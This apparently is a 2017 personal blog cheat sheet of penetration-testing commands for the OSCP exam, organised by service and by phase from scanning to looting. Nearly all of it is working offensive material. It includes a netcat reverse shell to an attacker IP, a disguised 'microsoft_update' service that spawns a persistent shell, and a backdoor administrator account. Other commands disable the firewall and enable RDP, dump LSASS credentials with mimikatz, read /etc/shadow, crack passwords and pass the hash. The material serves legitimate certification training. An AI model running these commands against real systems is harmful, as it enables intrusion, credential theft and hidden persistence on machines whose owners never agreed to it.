OSCP Cheat Sheet - Thor-Sec
OSCP Cheat Sheet

Here are some commands that I found helpful during the OSCP. I encourage you to take a look at the resource links that I've posted here to go into further detail on many of these topics.

Pre Scanning

  Quick pass:
    nmap --top-ports 10 --open <IP>
  Intense scan:
    nmap -p 1-65535 -T4 -A -v <IP>

Web

    nikto -h <IP>
    dirb http://<IP> /usr/share/wordlists/dirb/
    fimap -u <URL>
    ./dotdotpwn.pl -m <module> -h <host> [OPTIONS]
    wpscan --url http://<IP>/ --enumerate p

  File Include Resource 1 (https://evilzone.org/tutorials/remote-file-inclusion%28rfi%29/)
  File Include Resource 2 (http://www.hackersonlineclub.com/lfi-rfi)
  File Include Resource 3 (https://0xzoidberg.wordpress.com/category/security/lfi-rfi/)

SMB/RPC

    enum4linux -a <IP>
    nmap --script=smb* -p <port> <IP>
    rpcclient -U "" -N <IP>
    showmount -e <IP>
    mount -t cifs //<IP>/<share> -o username="guest",password=""
    net view \\<IP>
    nbtscan -r <range>
    smbclient -L \\<IP> -U <login>
    nmblookup -A <target>

SQL Injection

  SQL Injection Cheat Sheet (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
  Backdoor SQL Injection (http://resources.infosecinstitute.com/backdoor-sql-injection/)

    nmap -sV -Pn <IP>
    sqlmap -u <URL>

SMTP

    nmap --script=smtp* -p <port> <IP>

SNMP

    snmpwalk -c public <IP>
    snmpenum -t <IP>
    onesixtyone -c <community file> -i <host list>

FTP

    nmap --script=ftp* -p <port> <IP>
    ftp://<IP>

DNS

    ./dnsrecon.py -d <domain>
    ./dnsrecon.py -d <domain> -t axfr
    ./dnsrecon.py -d <domain> -D <wordlist> -t brt
    ./dnsrecon.py -d <domain> -t zonewalk
    nmap --script=dns-zone-transfer -p 53 ns2.megacorpone.com
    nmap -p- -sV --reason --dns-server 1.2.3.4 <IP>

Pass-the-Hash

    pth-winexe -U <user>%<hash> //<IP> cmd

Password Cracking

  Discover the type of hash that you have:
    hash-identifier

  John the Ripper /etc/shadow cracking:
    - Create a file with passwd
    - Create a file with shadow
    - Combine them into one document: unshadow
    john --wordlist=<any wordlist> <unshadowed file>
    -P <password list> -v <IP> ssh

  Medusa:
    medusa -h <IP> -U <user file> -P <pass file> -M http -m DIR:/admin

  Hashcat:
    hashcat -m 400 -a 0 <hash file> <wordlist>

TTY Shells

  See the TTY Shells (http://thor-sec.com/cheatsheet/tty_spawnage/) section.

Metasploit Payloads

  See the msfvenom cheat sheet (http://thor-sec.com/cheatsheet/msfvenom_cheat_sheet/) section.

Metasploit commands

    getuid
    search -f *pass*.txt
    shell
    getprivs
    sessions -i 1        (puts you back into your session)

  Turn a regular shell into a meterpreter shell:
    Attacker:
      use exploit/multi/handler
      set payload windows/shell/reverse_tcp
      set lport <port>
    Target:
    Attacker:
      Ctrl+Z              (to background the session)
      sessions -l         (this will list your sessions to verify which one it is)
      set lhost <IP>
      set lport <port>
      sessions -u 1       (the 1 is the session number)

Netcat

  See the Netcat cheat sheet (http://thor-sec.com/cheatsheet/netcat_cheatsheet/) section.

Useful Windows Commands

    net view
    net user
    net localgroup Users
    net localgroup Administrators
    net user hacker password /add
    net localgroup administrators hacker /add
    dir /s *.doc                                  (search)
    system("start cmd.exe /k <cmd>")
    sc create microsoft_update binpath= "cmd /K start c:\nc.exe -d -e cmd.exe" start= auto error= ignore
    C:\nc.exe -e c:\windows\system32\cmd.exe -vv <IP> <port>
    mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
    procdump.exe -accepteula -ma lsass.exe lsass.dmp                      (32-bit)
    mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
    <temp>\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp           (64-bit)
    reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
    netsh firewall set service remoteadmin enable
    netsh firewall set service remotedesktop enable
    netsh firewall set opmode disable
    %SYSTEMDRIVE%\boot.ini
    %WINDIR%\win.ini
    type %WINDIR%\System32\drivers\etc\hosts

Useful Nix Commands

  SUID root files:
    find / -user root -perm -4000 -print
  SGID root files:
    find / -group root -perm -2000 -print
  SUID & SGID files ownership:
    find / -perm -4000 -o -perm -2000 -print
  Files not owned by anyone:
    find / -nouser -print
  Files not owned by any group:
    find / -nogroup -print
  Symlinks and their pointers:
    find / -type l -ls

  Download an EXE from an FTP server:
    echo open <IP>> C:\script.txt
    echo user myftpuser>> C:\script.txt
    echo pass myftppass>> C:\script.txt
    echo get nc.exe>> C:\script.txt
    echo bye>> C:\script.txt
    ftp -s:script.txt

Shells

  See the resources (http://thor-sec.com/review/oscp_review/#resource) section.
  Reverse Shell Cheat Sheet (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)

Post Windows looting (brief)

    systeminfo
    type boot.ini
    hostname
    ipconfig /all
    netstat -ano
    net users
    net localgroup
    route print
    arp -a
    netsh firewall show state
    netsh firewall show config
    schtasks /query /fo LIST /v
    net start
    accesschk.exe -ucqv "Authenticated Users" *
    dir network-secret.txt /s
    windump -i 2 -w capture -n -U -s 0 src not <IP> and dst not <IP>

Nix looting (brief)

    locate proof.txt / network-secret.txt
    find -name "proof.txt" / "network-secret.txt"
    uname -a
    cat /proc/version
    cat /etc/passwd
    cat /etc/shadow
    cat /etc/group
    ls -alh | grep <pattern>
    ifconfig -a
    netstat -ano
    cat /etc/hosts
    arp
    tcpdump -i eth0 -w capture -s 0 src not <IP> and dst not <IP>
    tcpdump eth0 src not <IP> and dst not <IP>

Packet Sniffing

    tcpdump -i tap0 host <IP> tcp port 80 and not arp and not icmp -vvv
    tcpdump -i eth0 -w capture -n -U -s 0 src not <IP> and dst not <IP>
    tcpdump eth0 src not <IP> and dst not <IP>

Other

  Quick Kali Configuration

    SSH
      Start: service ssh start
      Stop:  service ssh stop

    HTTP Service
      Start:               service apache2 start
      Verify it's running: http://127.0.0.1
      Directory:           /var/www/
      Stop:                service apache2 stop

    Update boot sequence
      update-rc.d ssh enable
      update-rc.d apache2 enable
      rcconf (GUI)

  Compiling Exploits

    32-bit:
      gcc -m32 -o output32 hello.c
    64-bit:
      gcc -o output hello.c
    Windows compile:
      cd /root/.wine/drive_c/MinGW/bin
      wine gcc -o exploit.exe /tmp/exploit.c -lwsock32
      wine exploit.exe

Tags: OSCP
Categories: Cheatsheet
Updated: July 18, 2017